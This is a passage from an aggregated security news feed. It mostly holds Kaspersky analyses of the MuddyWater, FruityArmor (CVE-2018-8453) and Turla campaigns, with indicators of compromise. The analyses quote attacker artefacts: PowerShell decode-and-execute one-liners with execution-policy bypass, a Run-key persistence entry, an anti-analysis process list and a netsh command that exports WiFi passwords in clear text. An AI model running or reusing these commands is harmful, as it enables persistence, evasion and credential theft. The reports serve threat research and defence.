    President.doc, E-government of Afghanistan

    Technical details

    Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.

    The initial infection vector

    The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.

    Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box.

    The macro payload analysis, dropped files and registry keys

    The macro payload, which is Base64 encoded, does the following:

    1. Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the “ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another.

    \EventManager.dll
    \EventManager.logs
    \WindowsDefenderService.inil

    1. Adds a registry entry in the current user’s RUN key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process instantly without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.

    Name:WindowsDefenderUpdater
    Type:REG_EXPAND_SZ
    Data:c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,

    The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.

    Case 1: INF, SCT and text files dropped by the macro
    1. INF is launched via the advpack.dllLaunchINFSection” function.
    2. INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library).
    3. Via WMI (winmgmt), the JavaScript or VBscript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file.

    powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join(”,$d));

    PowerShell one-liner

    Encoded text file

    Execution flow:

    Case 2: VBS and text files dropped by the macro

    The VBS file decodes itself and calls mshta.exe, passing on one line of VBScript code to it, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).

    powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

    PowerShell one-liner

    Encoded text file

    Execution flow:

    The PowerShell code

    When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation.

    The first thing the PowerShell code does is to disable office Macro Warnings” and “Protected View“. This is to ensure future attacks don’t require user interaction. It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks.

    Next, it checks the running processes against a list of hard-coded process names; if any are found, the machine is forcefully rebooted. The names are linked to various tools used by malware researchers.

    win32_remote“,”win64_remote64“,”ollydbg“,”ProcessHacker“,”tcpview“,”autoruns“,”autorunsc“,”filemon“,”procmon“,”regmon“,”procexp“,”idaq“,”idaq64“,”ImmunityDebugger“,”Wireshark“,”dumpcap“,”HookExplorer“,”ImportREC“,”PETools“,”LordPE“,”dumpcap“,”SysInspector“,”proc_analyzer“,”sysAnalyzer“,”sniff_hit“,”windbg“,”joeboxcontrol“,”joeboxserver

    Blacklisted process names in the malware

    In some cases, it calculates the checksum of each running process name, and if it matches any hard-coded checksums, it causes a BSOD via the ntdll.dllNtRaiseHardError” function.

    CnC communication

    A URL is selected at random from a long list of embedded URLs held in an array named $dragon_middle. The selected URL is subsequently used for communication with the CnC server. If it can’t send data to the chosen CnC URL, it tries to obtain another random URL from $middle_dragon, then sleeps from one to 30 seconds and loops again.

    Victim system reconnaissance

    The code then tries to obtain the victim’s public IP via “https://api.ipify.org/”.

    The public IP is then POSTed along with OS Version, Internal IP, Machine Name, Domain Name, UserName after being encrypted to the previously chosen URL to register a new victim. This allows the attackers to accept or reject victims depending on their IPs, countries, geolocations, target enterprises, etc. Depending on the response from the attacker’s CnC, the victim is assigned an ID $sysid. This ID is sent to the CnC with each request for commands to execute.

    Supported commands

    upload“, “screenshot“, “Excel“, “Outlook“, “risk“, “reboot“, “shutdown“, “clean“. These commands vary from one version to another.

    1. The “screenshot” command takes a screenshot that is saved as a.PNG file in “ProgramData“.
    2. The “Excel” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Excel to execute this PowerShell script via DDE.
    3. The “Outlook” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Outlook via COM, via MSHTA.exe, to execute it.
    4. The “risk” command receives another stage of the PowerShell code, saves it in “c:\programdata\a.ps1” and then asks Explorer.exe via COM interaction to execute it.
    5. The “upload” command downloads files from the CnC and saves them locally in “C:\ProgramData“.
    6. The “clean” command destroys the victim’s disk drives C, D, E, F and then reboots.
    7. The “reboot” and “shutdown” commands immediately reboot and shut down the victim’s machine.

    In one version of the malware, the code checks if the “ProgramData” folder has folders or files with the keywords “Kasper“, “Panda“, or “ESET“.

    Victimology

    Most victims of MuddyWater were found in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan. Other victims were also recorded in Russia, Iran, Bahrain, Austria and Mali. The malicious decoy documents used in the attacks suggest they are geopolitically motivated, targeting sensitive personnel and organizations.

    Attacker deception and attribution

    The deobfuscated PowerShell code used by the MuddyWater group resembles previously seen PowerShell scripts that most likely served as prototypes. Multiple documents used in the attacks also contain embedded paths from their authors’ machines. These paths are embedded by Office under various circumstances, for instance, when somebody adds a binary object (an OLE control, e.g. text box or command button) into a Word document. The paths discovered are:

    • C:\Users\leo\AppData\Local\Temp\Word8.0\MSForms.exd
    • C:\Users\poopak\AppData\Local\Temp\Word8.0\MSForms.exd
    • C:\Users\Vendetta\AppData\Local\Temp\Word8.0\MSForms.exd
    • C:\Users\Turk\AppData\Local\Temp\Word8.0\MSForms.exd

    Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based. Turk could point to a person of Turkish origin. Poopak is a Persian girl’s name or might suggest the authors are not entirely happy with “Pak”, which could be short for Pakistan. Leo could be one of the attacker’s names. We also don’t rule out the possibility of false flags, with the attackers using random usernames to confuse researchers.

    In multiple instances, we have also found Chinese text inside the samples, possibly indicating the reuse of code by the attackers.

    无法连接到网址,请等待龙…
    无法访问本地计算机寄存器
    任务计划程序访问被拒绝

    Chinese text found in PowerShell code in multiple samples

    Unable to connect to the URL, please wait for the dragon…
    Unable to access local computer register
    Task Scheduler access denied

    Translation of Chinese text

    We have also noticed that for some samples, e.g. 5a42a712e3b3cfa1db32d9e3d832f8f1, the PowerShell code had only three CnC URLs, which leads us to believe that most of the CnC URLs in $dragon_middle found in other samples could actually be ‘noise’ to distract researchers or trigger false positives.

    http://www.cankayasrc[.]com/style/js/main.php
    http://ektamservis[.]com/includes/main.php
    http://gtme[.]ae/font-awesome/css/main.php

    Recommendations for organizations

    Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems.

    The best way to prevent attackers from finding and leveraging security holes, is to eliminate the holes altogether, including those related to improper system configurations or errors in proprietary applications. Organizations are also recommended to implement the following steps for an enhanced level of protection at their premises.

    1. Use PowerShell Constrained Language Mode as it uses IEX, Add-Type, and New-Object.
    2. Lock PowerShell Execution Policy, must be set to “AllSigned” via GPO.
    3. A whitelisting solution to prevent certain process child-parent execution hierarchies.
    Conclusion

    The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services. Kaspersky Lab expects these types of attacks to intensify in the near future.

    In order to protect your company from malware, Kaspersky Lab researchers recommend implementing the following measures:

    • Educate generic staff to be able to distinguish malicious behavior like phishing links.
    • Educate information security staff to have full configuration, investigative and hunting abilities.
    • Use a proven corporate-grade security solution in combination with anti-targeted attack solutions capable of detecting attacks by analyzing network anomalies.
    • Provide security staff with access to the latest threat intelligence data, which will arm them with helpful tools for targeted attack prevention and discovery, such as indicators of compromise and YARA rules.
    • Make sure enterprise-grade patch management processes are well established and executed.

    High-profile organizations should have elevated levels of cybersecurity, attacks against them are inevitable and are unlikely to ever cease.

    Additional information

    In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

    Further details about the attackers’ arsenal, additional indicators of compromise, YARA rules and attribution information is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

    Indicators of compromise MD5

    08acd1149b09bf6455c553f512b51085
    a9ec30226c83ba6d7abb8d2011cdae14
    E5683fb480353c0dec333a7573710748
    159238b473f80272fdcd0a8ddf336a91
    16ac1a2c1e1c3b49e1a3a48fb71cc74f
    1b086ab28e3d6f73c6605f9ae087ad4a
    23c82e8c028af5c64cbe37314732ec19
    24e1bd221ba3813ed7b6056136237587
    2e82e242cb0684b98a8f6f2c0e8a12f3
    37f7e6e5f073508e1ee552ebea5d200e
    3bb14adb551663fd2328d59f653ba757
    3c2a0d6d0ecf06f1be9ad411d06f7ba8
    4c5a5c236c9f4480b3d725f297673fad
    4f873578956d2790101443f24e4bd4d3
    5466c8a099d1d30096775b1f4357d3cf
    59502e209aedf80e170e653306ca1553
    5a42a712e3b3cfa1db32d9e3d832f8f1
    5bd61a94e7698574eaf82ef277316463
    5de97ae178888f2dd222bb8a66060ac2
    665947cf7037a6772687b69279753cdf
    7a2ff07283ddc69d9f34cfa0d3c936d4
    7beb94f602e97785370fec2d059d54a5
    801f34abbf90ac2b4fb4b6289830cd16
    864d6321be50f29e7a7a4bfab746245a
    8a36d91ca331f62642dbcafc2ea1b1ab
    9486593e4fb5a4d440093d54a3519187
    94edf251b5fe7cc19488b5f0c3c3e359
    9c6648cedeb3f5d9f6d104e638bd0c3d
    9f4044674100a8c28f9ed1b336c337ce
    aa1e8d0e1c4d4eb9984124df003ea7f2
    aa564e207926d06b8a59ba50ca2c543d
    ab4f947f4649b9ec28d182b02778aa69
    ad92ccf85ec170f340457d33bbb81df5
    b8939fa58fad8aa1ec271f6dae0b7255
    bb476622bcb0c666e12fbe4ccda8bbef
    be62fc5b1576e0a8491519e10bab931d
    bf310319d6ef95f69a45fc4f2d237ed4
    c375bbf248592cee1a1999227457c300
    c73fc71ee35e99230941f03fc32934d9
    c8b0458c384fd34971875b1c753c9c7c
    cd371d1d3bd7c8e2110587cfa8b7eaea
    ce2df2907ce543438c19cfaf6c14f699
    d15aee026074fbd18f780fb51ec0632a
    d632c8444aab1b43a663401e80c0bac4
    d6acee43d61cbd4bcd7a5bdf4ed9b343
    e3e25957b738968befcf2333aa637d97
    e5683fb480353c0dec333a7573710748
    eb69fb45feb97af81c2f306564acc2da
    f00fd318bf58586c29ab970132d1fd2a
    f2b5373f32a4b9b3d34701ff973ba69c
    f84914c30ae4e6b9b1f23d5c01e001ed
    faa4469d5cd90623312c86d651f2d930
    Ffb8ea0347a3af3dd2ab1b4e5a1be18a
    345b1ea293764df86506f97ba498cc5e
    029cb7e622f4eb0d058d577c9d322e92
    06178b5181f30ce00cd55e2690f667ac
    2b8ab9112e34bb910055d85ec800db3f
    47ec75d3290add179ac5218d193bb9a8
    befc203d7fa4c91326791a73e6d6b4da
    C561e81e30316208925bfddb3cf3360a
    132efd7b3bdfb591c1bf2a4e19c710eb
    e7a6c57566d9523daa57fe16f52e377e
    c0e35c4523a7931f4c99616d6079fd14
    245fa82c89875b70c2669921d4ba14d3

    File names

    %SystemDrive%\ProgramData\EventManager.dll
    %SystemDrive%\ProgramData\EventManager.logs
    %SystemDrive%\ProgramData\WindowsDefenderService.ini
    %SystemDrive%\ProgramData\Defender.sct
    %SystemDrive%\ProgramData\DefenderService.inf
    %SystemDrive%\ProgramData\WindowsDefender.ini
    %SystemDrive%\ProgramData\ZIPSDK\InstallConfNT.vbs
    %SystemDrive%\ProgramData\ZIPSDK\ProjectConfManagerNT.ini
    %SystemDrive%\ProgramData\WindowsDefenderTask.ini
    %SystemDrive%\ProgramData\WindowsDefenderTask.txt
    %SystemDrive%\ProgramData\WindowsDefenderTask.xml
    %SystemDrive%\ProgramData\DefenderNT\ConfigRegister.vbs
    %SystemDrive%\ProgramData\DefenderNT\SetupConf.ini
    %SystemDrive%\ProgramData\ASDKiMalwareSDK\ProjectConfSDK.vbs
    %SystemDrive%\ProgramData\ASDKiMalwareSDK\SetupConfSDK.ini
    %SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.ini
    %SystemDrive%\ProgramData\FirefoxSDK\ConfigRegisterSDK.vbs
    %SystemDrive%\ProgramData\OneDrive.dll
    %SystemDrive%\ProgramData\OneDrive.html
    %SystemDrive%\ProgramData\OneDrive.ini
    %SystemDrive%\ProgramData\WindowsNT\WindowsNT.ini
    %SystemDrive%\ProgramData\WindowsNT\WindowsNT.vbs
    %SystemDrive%\ProgramData\SYSTEM32SDK\ConfManagerNT.vbs
    %SystemDrive%\ProgramData\SYSTEM32SDK\ProjectConfManagerNT.ini
    %windir%\System32\Tasks\Microsoft\WindowsDefenderUpdater
    %windir%\System32\Tasks\Microsoft\MicrosoftOneDrive
    %windir%\System32\Tasks\Microsoft\WindowsDifenderUpdate
    %windir%\System32\Tasks\Microsoft\WindowsSystem32SDK
    %windir%\System32\Tasks\Microsoft\WindowsDefenderSDK
    %windir%\System32\Tasks\Microsoft\WindowsMalwareDefenderSDK
    %windir%\System32\Tasks\Microsoft\WindowsMalwareByteSDK

    Domains, URLs and IP addresses

    http://www.cankayasrc[.]com/style/js/main.php
    http://ektamservis[.]com/includes/main.php
    http://gtme[.]ae/font-awesome/css/main.php
    https://www.adfg[.]ae/wp-includes/widgets/main.php
    http://adibf[.]ae/wp-includes/js/main.php
    http://hubinasia[.]com/wp-includes/widgets/main.php
    https://benangin[.]com/wp-includes/widgets/main.php

    104.237.233.60
    104.237.255.212
    104.237.233.40
    5.9.0.155

    Zero-day exploit (CVE-2018-8453) used in targeted attacks

    Malware Alerts - Wed, 10/10/2018 - 03:00

    Yesterday, Microsoft published their security bulletin, which patches CVE-2018-8453, among others. It is a vulnerability in win32k.sys discovered by Kaspersky Lab in August. We reported this vulnerability to Microsoft on August 17, 2018. Microsoft confirmed the vulnerability and designated it CVE-2018-8453.

    In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys. The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.

    So far, we detected a very limited number of attacks using this vulnerability. The victims are located in the Middle East.

    Kaspersky Lab products detected this exploit proactively through the following technologies:

    1. Behavioral detection engine and Automatic Exploit Prevention for endpoints
    2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

    Kaspersky Lab Verdicts for the artifacts in this campaign are:

    • HEUR:Exploit.Win32.Generic
    • HEUR:Trojan.Win32.Generic
    • PDM:Exploit.Win32.Generic

    More information about this attack is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com

    Technical details

    CVE-2018-8453 is a Use-After-Free inside win32kfull!xxxDestroyWindow that resembles an older vulnerability — CVE-2017-0263. CVE-2017-0263 was originally deployed by the Sofacy APT, together with a PostScript exploit, back in 2017.

    For technical analysis of the vulnerability, we completely reverse-engineered the ITW exploit sample obtained and rewrote it into a full Proof of Concept.

    The exploitation of this vulnerability depends on a sequence of events that are performed from hooks set on three usermode callback functions – fnDWORD, fnNCDESTROY, and fnINLPCREATESTRUCT. The exploit installs these hooks by replacing the function pointers in the KernelCallbackTable:

    Hooked functions in the Kernel Callback Table

    Inside the fnINLPCREATESTRUCT hook, the exploit initializes a “SysShadow” window by explicitly assigning a position to it:

    Usermode hook on fnINLPCREATESTRUCT initializes SysShadow

    When processing the WM_LBUTTONDOWN message, the fnDWORD hook executes the DestroyWindow function on the parent, which results in the window being marked as free and subsequently freed by the garbage collector.

    The issue lies inside the fnNCDESTROY hook that is performed during execution of the DestroyWindow function. This hook executes the NtUserSetWindowFNID syscall, which contains a flawed logic to change the fnid status of the window without properly checking if it is set to FNID_FREED.

    Vulnerable code inside NtUserSetWindowFNID

    The fnid status of the window is located at offset 0x02a in the tagWND structure:

    kd> dt win32k!tagWND

    +0x02a fnid : Uint2B

    When the scrollbar is initially created, it has the value FNID_SCROLLBAR (0x029A).

    The next diagram shows the value of fnid prior and after execution of the NtUserSetWindowFNID syscall:

    Scrollbar fnid prior and after execution of NtUserSetWindowFNID syscall

    We can check what the new fnid value is by verifying it against the ReactOS source code:

    /* FNIDs for NtUserSetWindowFNID, NtUserMessageCall */
    #define FNID_SCROLLBAR 0x029A

    #define FNID_BUTTON 0x02A1

    #define FNID_FREED 0x8000 /* Window being Freed… */

    This action results in the first scrollbar being destroyed, while the system still maintains a reference to a “SysShadow” class, as the scrollbar fnid is no longer marked as FNID_FREED, but as FNID_BUTTON instead.

    To successfully reclaim the freed memory pool, the exploit contains a number of different feng shui tactics. The spray procedure is dependent on the exploited Windows version, and because the exploit targets a wide range of operating systems, it includes five separate functions for spraying:

    Heap spraying procedures supported in the exploit

    For the latest supported version (Windows 10 RS4), the spray tactic is quite complicated. The kernel is sprayed with bitmap objects of different size. This is required to exhaust the memory allocator to eventually bypass the Low Fragmentation Heap security mitigations that were significantly improved in the latest Windows builds:

    Heap Feng Shui technique for Windows RS4 17134

    This leads to the following memory layout, where USERTAG_SCROLLTRACK is the freed pool allocation:

    Freed scrollbar heap allocation

    When another scrollbar is allocated, the SysShadow class memory reference is reused, but its contents are attacker-controlled, because the freed Usst (ffffee30044b2a10) and Gpbm (ffffee30044b2a90) pools were merged into a single block:

    Freed allocation is merged with the following pool

    This results in a powerful arbitrary kernel Read\Write using GDI Bitmap primitives that works even on the latest Windows versions.

    Following successful exploitation, a slightly modified Token-stealing payload is used to swap the current process Token value with the one from the SYSTEM EPROCESS structure:

    Modified Token-stealing payload process

    So far, we’ve observed the usage of this exploit in a small number of targeted attacks, when the exploit is packaged in a malware installer. The installer requires system privileges to install its payload. The payload is a sophisticated implant, used by the attackers for persistent access to the victims’ machines. Some of its main characteristics include:

    • Encrypting the main payload using AES-256-CBC with the SHA-1 of the SMBIOS UUID (this makes it impossible to decrypt the payload on machines other than the victim, if the SMBIOS UUID is not known)
    • Using Microsoft BITS (Background Intelligent Transfer Service) for communicating with its C&C servers, an unusual technique
    • Storing the main payload in a randomly named file on disk; the loader contains a hash of the filename and attempts to find the payload by comparing the filename hash for all files in the Windows directory

    More details on this malware and the APT behind it are available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

    Victims

    The distribution of the attack seems to be highly targeted, affecting less than a dozen victims in the Middle East region, according to our telemetry.

    Attribution

    During our investigation, we discovered the attackers were using a PowerShell backdoor that has previously been seen exclusively used by the FruityArmor APT. There is also an overlap in the domains used for C2 between this new set of activity and previous FruityArmor campaigns. That makes us assess with medium confidence that FruityArmor is responsible for the attacks leveraging CVE-2018-8453.

    Conclusion

    Even when deploying 0-days seems to be more frequent than it used to be, this would be the second time we have spotted FruityArmor using one of them to distribute its malware. This points to the resources and sophistication of this actor, along with the advanced final-stager they distribute.

    So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.

    We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar.

    Appendix I – Indicators of compromise: Domains:

    weekendstrips[.]net
    shelves-design[.]com

    Shedding Skin – Turla’s Fresh Faces

    Malware Alerts - Thu, 10/04/2018 - 12:00

    Turla, also known as Venomous Bear, Waterbug, and Uroboros, may be best known for what was at the time an “ultra complex” snake rootkit focused on NATO-related targets, but their malware set and activity is much broader. Our current focus is on more recent and upcoming activity from this APT, which brings an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed.

    Much of our 2018 research focused on Turla’s KopiLuwak javascript backdoor, new variants of the Carbon framework and meterpreter delivery techniques. Also interesting was Mosquito’s changing delivery techniques, customized PoshSec-Mod open-source powershell use, and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018.

    For a first, our KopiLuwak research identified targets and delivery techniques, bringing more accuracy and reliability to the discussion. Also interesting is a review of Turla scripting artefacts leading to newer efforts like KopiLuwak, tracing from older scripting in development efforts in WhiteAtlas and WhiteBear. And, we find 2018 KopiLuwak delivery techniques that unexpectedly matched Zebrocy spearphishing techniques for a first time as well.

    Also highly interesting and unusual was the MiTM techniques delivering Mosquito backdoors. In all likelihood, Turla delivered a physical presence of some sort within Wifi range of targets. Download sessions with Adobe’s website were intercepted and injected to deliver Mosquito trojanized installers. This sort of hypothesis is supported by Mosquito installers’ consistent wifi credential theft. Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements. We expect to see more Mosquito activity into 2019.

    And finally, we discuss the Carbon framework, tying together the older, elegant, and functional codebase sometimes called “Snake lite” with ongoing efforts to selectively monitor high value targets. It appears that the backdoor is pushed with meterpreter now. And, as we see code modifications and deployment in 2018, we predict more development work on this matured codebase along with selective deployment to continue into 2019.

    Essentially, we are discussing ongoing activity revolving around several malware families:

    • KopiLuwak and IcedCoffeer
    • Carbon
    • Mosquito
    • WhiteBear
    Technical Rattle Turla’s Shifting to Scripting KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas

    Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors. The White Atlas framework often utilized a small Javascript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards. A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes.

    IcedCoffee

    Turla’s first foray into full-fledged Javascript backdoors began with the usage of the IcedCoffee backdoor that we reported on in our private June 2016 “Ice Turla” report (available to customers of Kaspersky APT Intelligence Services), which led later to their more fully functional and complex, recently deployed, KopiLuwak backdoor. IcedCoffee was initially dropped by exploit-laden RTF documents, then later by macro-enabled Office documents. The macro code used to drop IcedCoffee was a slightly modified version of that found in White Atlas, which is consistent with the code sharing present in many Turla tools. A noteworthy change to the macro code was the addition of a simple web beacon that relayed basic information to Turla controlled servers upon execution of the macro, which not only helped profile the victim but also could be used to track the effectiveness of the attack.

    IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server. IcedCoffee has no built-in command capability, instead it may receive javascript files from the C2 server, which are deobfuscated and executed in memory, leaving nothing behind on disk for forensic analysis. IcedCoffee was not widely deployed, rather it was targeted at diplomats, including Ambassadors, of European governments.

    KopiLuwak

    In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world). The targeting for this new malware was consistent with earlier Turla operations, focusing on European governments, but it was even more selectively deployed than IcedCoffee.

    The KopiLuwak script is decoded by macro code very similar to that previously seen with IcedCoffee, but the resulting script is not the final step. This script is executed with a parameter used as a key to RC4 decrypt an additional layer of javascript that contains the system information collection and command and control beaconing functionality. KopiLuwak performs a more comprehensive system and network reconnaissance collection, and like IcedCoffee leaves very little on disk for investigators to discover other than the base script.

    Unlike IcedCoffee, KopiLuwak contains a basic set of command functionality, including the ability to run arbitrary system commands and uninstall itself. In mid-2017 a new version was discovered in which this command set had been further enhanced to include file download and data exfiltration capabilities.

    The most recent evolution in the KopiLuwak life cycle was observed in mid-2018 when we observed a very small set of systems in Syria and Afghanistan being targeted with a new delivery vector. In this campaign the KopiLuwak backdoor was encoded and delivered in a
    Windows shortcut (.lnk) file. The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier.

    Carbon – the long tail

    Carbon continues to be deployed against government and foreign affairs related organizations in Central Asia. Carbon targeting in this region has shifted across a few countries since 2014. Here, we find a new orchestrator v3.8.2 and a new injected transport library v4.0.8 deployed to multiple systems. And while we cannot identify a concrete delivery event for the dropper, its appearance coincides with the presence of meterpreter. This meterpreter reliance also coincides with wider Turla use of open source tools that we documented towards the end of 2017 and beginning of 2018.

    The Epic Turla operation reported in 2014 involved highly selective Carbon delivery and was a long term global operation that affected hundreds of victims. Only a small portion of these systems were upgraded to a malware set known as “the Carbon framework”, and even fewer received the Snake rootkit for “extreme persistence”. So, Carbon is known to be a sophisticated codebase with a long history and very selective delivery, and coincides with Snake rootkit development and deployment. In light of its age, it’s interesting that this codebase is currently being modified, with additional variants deployed to targets in 2018.

    We expect Carbon framework code modifications and predict selective deployment of this matured codebase to continue into 2019 within Central Asia and related remote locations. A complex module like this one must require some effort and investment, and while corresponding loader/injector and lateral movement malware moves to open source, this backdoor package and its infrastructure is likely not going to be replaced altogether in the short term.

    .JS attachments deliver Skipper/WhiteAtlas and WhiteBear

    We introduced WhiteBear actionable data to our private customers early 2017, and similar analysis to that report was publicly shared eight months later. Again, it was a cluster of activity that continued to grow past expectations. It is interesting because WhiteBear shared known compromised infrastructure with KopiLuwak: soligro[.]com. WhiteBear scripted spearphish attachments also follows up on initial WhiteAtlas scripting development and deployment efforts.

    Mosquito’s Changing 2018 Delivery Techniques

    In March 2018, our private report customers received actionable data on Mosquito’s inclusion of fileless and customized Posh-SecMod metasploit components. When discussion of the group’s metasploit use was made public, their tactics began to change.

    The “DllForUserFileLessInstaller” injector module maintained a compilation date of November 22, 2017, and was starting to be used by Mosquito to inject ComRAT modules into memory around January 2018. It is a small piece of metasploit injector code that accounts for issues with Wow64. Also, related open source powershell registry loader code oddly was modified to avoid AES use, and opt for 3DES encryption instead. Here is the modified Mosquito code:

    And here is the default Posh-SecMod code that they ripped from:

    We expect to see more open-source based or inspired fileless components and memory loaders from Mosquito throughout 2018. Perhaps this malware enhancement indicates that they are more interested in maintaining current access to victim organizations than developing offensive technologies.

    MiTM and Ducking the Mosquito Net

    We delivered actionable data on Mosquito to our private intel customers in early 2017. Our initial findings included data around an unusual and legitimate download URL for trojanized installers:

    hxxp://admdownload.adobe[.]com/bin/live/flashplayer23ax_ra_install.exe

    While we could not identify the MiTM techniques with accuracy at the time, it is possible either WiFi MiTM or router compromise was used in relation to these incidents. It is unlikely, but possible, that ISP-level FinFisher MiTM was used, considering multiple remote locations across the globe were targeted.

    But there is more incident data that should be elaborated on. In some cases, two “.js” files were written to disk and the infected system configured to run them at startup. Their naming provides insight into the intention of this functionality, which is to keep the malware remotely updated via google application, and maintain local settings updates by loading and running “1.txt” at every startup. In a way, this staged script loading technique seems to be shared with the IcedCoffee javascript loading techniques observed in past Turla incidents focused on European government organizations. Updates are provided from the server-side, leading to fewer malware set findings.

    • google_update_checker.js
    • local_update_checker.js

    So, we should consider the wifi data collection that Mosquito Turla performed during these updates, as it hasn’t been documented publicly. One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all local host’s WiFi profiles (settings and passwords) to %APPDATA%\<profile>.xml with a command line call:

    cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"

    They then gather more network information with a call to ipconfig and arp -a. Maintaining ongoing host-based collection of wifi credentials for target networks makes it far easier to possess ongoing access to wifi networks for spoofing and MiTM, as brute-forcing or otherwise cracking weakly secured WiFi networks becomes unnecessary. Perhaps this particular method of location-dependent intrusion and access is on the decline for Mosquito Turla, as we haven’t identified new URLs delivering trojanized code.

    The Next Strike

    It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on.

    Both Turla’s Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets. While WhiteAtlas and WhiteBear activity stretched across the globe to include foreign affairs related organizations, not all targeting consistently followed this profile. Scientific and technical centers were also targeted, and organizations outside of the political arena came under focus as well. Turla’s KopiLuwak activity does not necessarily focus on diplomatic/foreign affairs, and also winds down a different path. Instead, 2018 activity targeted government related scientific and energy research organizations, and a government related communications organization in Afghanistan. This highly selective but wider targeting set most likely will continue into 2019.
    From the targeting perspective, we see closer ties between the KopiLuwak and WhiteBear activity, and closer alignments between Mosquito and Carbon activity.

    And WhiteBear and KopiLuwak shared infrastructure while deploying unusual .js scripting. Perhaps open source offensive malware will become much more present in Mosquito and Carbon attacks as we see more meterpreter and injector code, and more uniquely innovative complex malware will continue to be distributed with KopiLuwak and a possible return of WhiteBear. And as we see with borrowed techniques from the previous zebrocy spearphishing, techniques are sometimes passed around and duplicated.

    CEO Fraud

    SANS Tip of the Day - Thu, 10/04/2018 - 01:00
    CEO Fraud / BEC is a type of targeted attack. It commonly involves a cyber criminally pretending to be your boss, then tricking or fooling you into sending the criminal highly sensitive information or initiating a wire transfer. Be highly suspicious of any emails demanding immediate action and/or asking you to bypass any security procedures.

    Roaming Mantis part III: iOS crypto-mining and spreading via malicious content delivery system

    Malware Alerts - Mon, 10/01/2018 - 06:00

